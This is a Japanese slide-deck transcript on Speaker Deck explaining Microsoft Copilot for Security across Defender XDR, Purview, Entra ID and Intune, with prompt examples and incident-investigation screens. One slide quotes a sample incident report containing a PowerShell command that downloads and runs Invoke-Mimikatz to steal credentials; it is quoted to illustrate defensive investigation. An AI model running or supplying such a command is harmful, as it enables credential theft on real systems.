Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
なんでもCopilot for Security
Search
Sponsored
·
Your Podcast. Everywhere. Effortlessly.
Share. Educate. Inspire. Entertain. You do you. We'll handle the rest.
→
Kunii, Suguru
August 14, 2024
Technology
5.1k
4
Share
なんでもCopilot for Security
2024年8月14日開催 「なんでもCopilot」の登壇資料
Kunii, Suguru
August 14, 2024
More Decks by Kunii, Suguru
See All by Kunii, Suguru
国井さんにPurview の話を聞く会
sophiakunii
1
540
Microsoft Defender XDRで疲弊しないためのインシデント対応
sophiakunii
3
850
Microsoft Intune アプリのトラブルシューティング
sophiakunii
1
1.7k
実録 Intune デバイス登録トラブルシューティング
sophiakunii
0
230
Microsoft 365 でデータセキュリティを強化しよう
sophiakunii
2
1.2k
Monthly Microsoft Intune Briefing Call Japan #2
sophiakunii
0
180
Copilot for Security を使った MDE / Sentinel のログ調査
sophiakunii
3
700
Microsoft Defender for Endpoint でインシデント対応する上で知っておきたい Windows の知識
sophiakunii
0
400
Microsoft Defender for Endpoint でインシデント対応する上で知っておきたい Windows の知識
sophiakunii
6
5.7k
Other Decks in Technology
See All in Technology
10サービス以上のメール到達率改善を地道に継続的に進めている話 / Continue to improve email delivery rates across multiple services
yamaguchitk333
6
1.6k
LookerとADKで作る社内AIエージェント
chanyou0311
0
110
Oracle Cloud Infrastructure presents managed, serverless MCP Servers for Oracle AI Database
thatjeffsmith
0
260
"うちにはまだ早い"は本当? ─ 小さく始めるPlatform Engineering入門
harukasakihara
6
520
カオナビに Suspenseを導入するまで / The Road to Suspense at kaonavi
kaonavi
1
450
マンション備え付けのネットワークとLTE回線を組み合わせた ネットワークの安定化の考案
harutiro
1
120
Claude Codeウェビナー資料 - AWSの最新機能をClaude Codeで高速に検証する
oshanqq
0
280
SLI/SLO、「完全に理解した」から「チョットデキル」へ
maruloop
5
440
いつの間にかデータエンジニア以外の業務も増えていたけど、意外と経験が役に立ってる
zozotech
PRO
0
530
Vision Banana: Image Generators are Generalist Vision Learners
kzykmyzw
0
370
AI 時代の Platform Engineering
recruitengineers
PRO
1
170
自動テストだけで リリース判断できるチームへ - 鍵はテストの量ではなくリリース判断基準の再設計にあった / Redesigning Release Criteria for Lightweight Releases
ewa
7
3.7k
Featured
See All Featured
Un-Boring Meetings
codingconduct
0
290
Kristin Tynski - Automating Marketing Tasks With AI
techseoconnect
PRO
0
240
Visualizing Your Data: Incorporating Mongo into Loggly Infrastructure
mongodb
49
9.9k
Principles of Awesome APIs and How to Build Them.
keavy
128
17k
Design of three-dimensional binary manipulators for pick-and-place task avoiding obstacles (IECON2024)
konakalab
0
420
Easily Structure & Communicate Ideas using Wireframe
afnizarnur
194
17k
Applied NLP in the Age of Generative AI
inesmontani
PRO
4
2.2k
brightonSEO & MeasureFest 2025 - Christian Goodrich - Winning strategies for Black Friday CRO & PPC
cargoodrich
3
690
The AI Search Optimization Roadmap by Aleyda Solis
aleyda
1
5.8k
The Hidden Cost of Media on the Web [PixelPalooza 2025]
tammyeverts
2
290
Visualization
eitanlees
150
17k
How Software Deployment tools have changed in the past 20 years
geshan
0
33k
Transcript
なんでも Copilot for Security
2 自己紹介 • 国井 傑 (くにい すぐる) • 株式会社エストディアン 所属
• 公立大学法人会津大学 客員教授 • マイクロソフト認定トレーナー (1997~2025) • Microsoft MVP for Security (2006~2025) • ブログ https://AzureAD.net • 主な職務・実績 • Microsoft 365 セキュリティ/インフラ管理に関わる トレーニング • テクニカル ライター • ひと目でわかる Microsoft Defender for Endpoint • 最短突破 Microsoft Azure セキュリティテクノロジ合格教本 • ひと目でわかる Microsoft Intune など
None
4 拡散希望! https://aka.adfs.jp/wishlist
はじめに
6
7 もうちょっとわかりやすくすると.. Copilot for Security Microsoft Defender TI / EASM
Microsoft Sentinel urlscan Microsoft Entra ID Microsoft Intune Microsoft Defender XDR Microsoft Purview 調査対象 過去ログの参照 脅威情報の参照
8 SCU の割り当て Copilot for Security Microsoft Entra ID Microsoft
Intune Microsoft Defender XDR Microsoft Purview 調査対象 Security Compute Unit (SCU) Microsoft Azure
9 使い始めたいと思ったら覚えておくこと SCU をユニット単位で利用権を購入し、ユニットの範囲内でプロンプトを 利用します。ただし、そのコストはユニット当たり$2880と高額なので 使用しないときは Azure リソースごと削除しておきましょう
10 Copilot for Security ユーザー インターフェイス 埋め込み型 スタンドアロン型 https://securitycopilot.microsoft.com/
Microsoft Defender XDR
12 • 埋め込み型から利用可能なスキル • インシデント概要解説 • ファイルの解説 • プロセスのコマンド解説 •
自然言語からクエリの作成 • インシデント レポート • スタンドアロン型から利用可能なスキル • 上記の内容 • インシデントに関連する IOC と TTP • 脆弱性の管理 (CVE, ASR) スキル
13 インシデントの調査 ~ サンプルのインシデント
14 インシデントにアクセスすると自動的に概要情報を要約
15 ガイド付き応答による能動的なインシデント対応
16 ガイド付き応答による能動的なインシデント対応
17 インシデント レポートから概要を把握 重要度の高いインシデント「1つのエンドポイント上のMimikatz認証 情報盗難ツール」は、2024-06-10 10:18:07 UTC ~ 2024-06-10 10:18:18
UTCの間に発生しました。 クレデンシャルアクセス:2024-06-10 10:18:07 UTCにおいて、 Mimikatz認証情報盗難ツールがデバイス「xxxxx」(Windows 10)上で検出され、ユーザー「SuguruKUNII」に影響を与えました。 このツールはプロセス「cmd.exe」に関連していた。 その直後、同時に「xxxxx」上のDefenderが、コマンドライン 「C:¥Windows¥System32¥WindowsPowerShell¥v1.0」内の 「HackTool:PowerShell/Mimikatz.B」の実行を阻止した。exe powershell -c IEX(New-Object System.Net.WebClient).DownloadString(¥u0027hxxps://raw .githubusercontent.com/g4uss47/Invoke- Mimikatz/master/Invoke-Mimikatz.ps1u0027);Invoke- Mimikatz'.この操作により、「SuguruKUNII」からの認証情報の盗 難の可能性がなくなった。
18 Microsoft Defender for Office 365 x Copilot Copilot に投げてみる
19 調査結果
20 プラグインの活用 Copilot for Security のプロンプトは 有効化されたプラグインを利用します。 既定のプラグインに加えてサードパーティの プラグインを利用したり、プラグインそのものを 追加したりすることができます。
21 プラグインの設定
22 プロンプトブックの活用 プロンプトブックとはプロンプトに入れる 文字列をあらかじめ定義し、必要なステップを 自動的に行う「プロンプト集」です。 プロンプトブックは MS 提供のもののほかに 自身で作成して利用することもできます。
Microsoft Purview
24 • 埋め込み型から利用可能なスキル • DLP アラートの説明 • 内部リスクの管理アラートの詳細 • スタンドアロン型から利用可能なスキル
• 秘密度ラベル • DLP • 内部リスクの管理 • プロンプト例 • 上記の内容 • 優先すべきDLPアラート • ユーザーについての詳細 (アラートにどうかかわっているか?を調査) • DLP アラートに関連するデータリスクは何か • DLP アラートに関連するファイルについて過去7日間で行われたこと • 特定のファイルに対して設定されている秘密度ラベルについて スキルとプロンプト例
25 DLP アラートの要約
26 内部リスクの管理アラートの要約
27 内部リスクの管理アラートの要約
28 秘密度ラベルの変更/削除の履歴を追跡
Microsoft Entra ID
30 • 埋め込み型から利用可能なスキル • Identity Protection によって検知されたサインイン/ユーザー リスクの解説 • スタンドアロン型から利用可能なスキル
• ユーザー/グループの情報 • サインインログ/監査ログの情報 • プロンプト例 • Identity Protection に出力されたログの要約 • 特定の日付、特定のユーザーによるサインイン履歴の追跡 • 過去14日間でサインインしたユーザーの一覧 • Microsoft Teams 以外のサービスにアクセスしたゲスト ユーザーの一覧 • 過去7日間で削除されたユーザー • アプリの登録に特定のアプリを登録したユーザーの追跡 スキルとプロンプト例
31 Identity Protection によって検知されたサインイン リスク
32 不要なゲストユーザーを見極める
Microsoft Intune
34 • 埋め込み型から利用可能なスキル • デバイスの探索/別のデバイスとの比較 • エラーコードの分析 • 構成プロファイル/コンプライアンスポリシーの集計 (説明)
• 構成プロファイル/コンプライアンスポリシー/セキュリティベースラインの項目説明 • スタンドアロン型から利用可能なスキル • デバイスの情報 • ユーザー/デバイスを起点とするアプリの情報 スキル
35 • プロンプト例 • 構成プロファイルの解説 • デバイスのハードウェア構成の比較 • 非準拠デバイスの非準拠理由 •
エラーコードの解説 • 特定ユーザーが利用しているデバイス一覧 • 特定デバイスにインストールしたアプリ一覧 • DeviceA デバイスと DeviceB デバイス間のコンプライアンス ポリシーの類似点は何ですか? • DeviceA と DeviceB のデバイス構成プロファイルの違いは何ですか? • DeviceA と DeviceB にインストールされているアプリケーションを比較 プロンプト例
36 埋め込み型の設定
37 埋め込み型の設定
38 結果 Intune の設定 "ウィジェットを許可する" について説明します。この設定は、デバイス上のウィジェット機能が 許可されるかどうかを指定します。ウィジェットは、ユーザーがカスタマイズできるニュースとフィードのサービスで、 このサービスをオフにすると、このサービスを使用しているアプリが動作を停止する可能性があります。 この設定は、ウィジェット体験全体に適用され、タスクバー上のコンテンツを含みます。デフォルトではウィジェットは オンになっており、設定で変更しない限り、以前にこの機能をオンにした場合は自動的にオンになります。
設定の詳細は以下の通りです: •形式: int •アクセスタイプ:追加、削除、取得、置換 •デフォルト値: 1 許可される値: •0:許可されません。 •1(デフォルト):許可されます。 この設定は、グループポリシーまたはMDMソリューション(Microsoft Intuneなど)のカスタム設定を使用して ウィジェットをオフにすることができます。グループポリシーの場合、Intuneの設定カタログでも利用可能な 「ウィジェットを許可する」ポリシーを使用できます。MDMソリューションの場合、NewsandInterests設定 プロバイダ(CSP)のAllowNewsAndInterests設定を使用できます。 この設定は、以下の範囲とエディションで適用可能です: •スコープ:デバイス •エディション:Pro、Enterprise、Education、Windows SE、IoT Enterprise / IoT Enterprise LTSC •適用可能なOS:Windows 11, version 21H2 [10.0.22000] 以降
39 まとめ Copilot for Security Microsoft Defender TI / EASM
Microsoft Sentinel urlscan Microsoft Entra ID Microsoft Intune Microsoft Defender XDR Microsoft Purview プロンプトブック 会社のインシデント 対応フローを実装 調査対象 不要なゲストユーザーを 見極める エラーコードの検索 インシデントの概要 特定エンティティの調査 レポート作成 過去ログの参照 脅威情報の参照 秘密度ラベルの設定変更 DLP のアラートを繰り返し 行うユーザーの追跡 ファイル プロンプトで利用する データをあらかじめ登録
sophiakunii
yamaguchitk333
chanyou0311
thatjeffsmith
harukasakihara
kaonavi
harutiro
.jpg){kind=avatar}
oshanqq
maruloop
zozotech
kzykmyzw
recruitengineers
ewa
codingconduct
techseoconnect
mongodb
keavy
konakalab
afnizarnur
inesmontani
.jpg){kind=avatar}
cargoodrich
aleyda
tammyeverts
eitanlees
geshan
